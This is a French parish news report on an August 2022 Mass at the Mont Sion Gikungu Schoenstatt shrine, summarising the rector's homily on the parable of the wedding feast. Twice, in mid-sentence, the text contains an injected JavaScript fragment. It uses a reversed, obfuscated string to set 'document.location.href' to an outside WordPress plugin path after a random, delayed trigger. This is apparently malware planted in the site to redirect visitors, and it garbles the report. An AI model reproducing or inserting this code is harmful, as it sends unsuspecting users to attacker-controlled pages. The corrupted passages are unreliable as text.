La célébration eucharistique de ce jeudi, 18 août 2022 à 17 heures au Mont Sion Gikungu a été présidée par le Père Longin NTIRANYIBAGIRA, Recteur du Sanctuaire et animée en chants liturgiques par la chorale Sancta Maria. Cette Eucharistie du 18 de chaque mois diffère de toutes les autres qui y sont célébrées. Elle a une particularité parce qu’elle offre une occasion aux Schoenstattiens de renouveler leur Alliance d’Amour scellée avec la Mère Trois fois Admirable.
Les saintes Écritures du jour ont été tirées du livre du prophète Ézékiel (Ez 36, 23-28) et l’Évangile de Jésus Christ selon saint Matthieu (Mt 22, 1-14).
La Parole de Dieu est la vie et elle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne vie, a-t-il introduit son homélie. Et de continuer par un passage qui est toujours dit durant la célébration de la sainte Messe « Heureux les invités au repas du Seigneur … ». Comprenons par-là que le Seigneur nous invite à son festin et nous laisse le libre choix de répondre affirmativement ou négativement. L’on peut se demander ici qui sont ses invités ? La réponse est claire et simple : L’Église. Tout chrétien baptisé est un invité du Seigneur peu importe d’où il vient. L’Eucharistie est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc la noce. Nous sommes ici parce que nous avons répondu OUI à cette invitation. Le Seigneur nous y invite toujours mais parfois il y a des obstacles qui nous empêchent d’être présents. Le célébrant a alors énuméré ces obstacles qui sont notamment :
- Le refus
- Le mépris
- L’athéisme
- L’indifférence
- Le relativisme
- Empoigner les serviteurs (pour ce dernier, le Recteur a fait savoir aux fidèles qui étaient venus en grand nombre que quand ils refusent de les écouter, les insultent, … c’est synonyme de les empoigner. Il a demandé à tout un chacun de regarder comment il accueille ses serviteurs.)
Il a poursuivi en disant que l’Église est composée de nous tous (toi et moi) mais malheureusement, déplore le Recteur, nous n’agissons tous pour son développement. Il y en a ceux qui cherchent à mettre des bâtons dans les roues de l’Église, cette parabole de l’Évangile l’expliquant bien. Toujours sur la parabole, il est revenu sur le vêtement de noce où on voit que celui qui s’est présenté sans la tenue adéquate a été refoulé. Il a invité l’assemblée de Dieu à changer, à se laisser purifier de toutes souillures par le Seigneur, comme la première lecture le dit, afin de recevoir de lui un cœur nouveau et qu’il mette en eux un esprit nouveau. Propagez la bonne nouvelle à travers le renouvellement de l’Alliance et prions la Vierge Marie pour qu’elle intercède pour nous, a-t-il conclu.